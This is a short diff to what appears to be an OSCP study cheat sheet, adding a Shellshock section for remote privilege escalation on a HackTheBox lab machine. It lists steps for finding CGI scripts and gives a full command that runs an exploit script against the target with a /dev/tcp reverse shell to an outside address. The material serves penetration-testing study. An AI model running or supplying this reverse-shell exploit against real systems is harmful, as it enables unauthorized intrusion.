jonnyzar/OSCP_CheatSheets/Cheat_Sheets/linux_cheatsheet.md

+# Remote Priv Esc

+## Shell Shock

+* spot /cgi-bin
+* dirbust .sh .cgi or some more exotic script files in it
+* use 34766.php

+`php 34766.php -u http://shocker.htb/cgi-bin/user.sh -c "sh -i >& /dev/tcp/10.10.14.18/443 0>&1" `

-# General Info and Approach
+# Local Priv Esc: General Info and Approach

 * Generally you end up in restricted user account or shell
 * You can almost always write to `/tmp` folder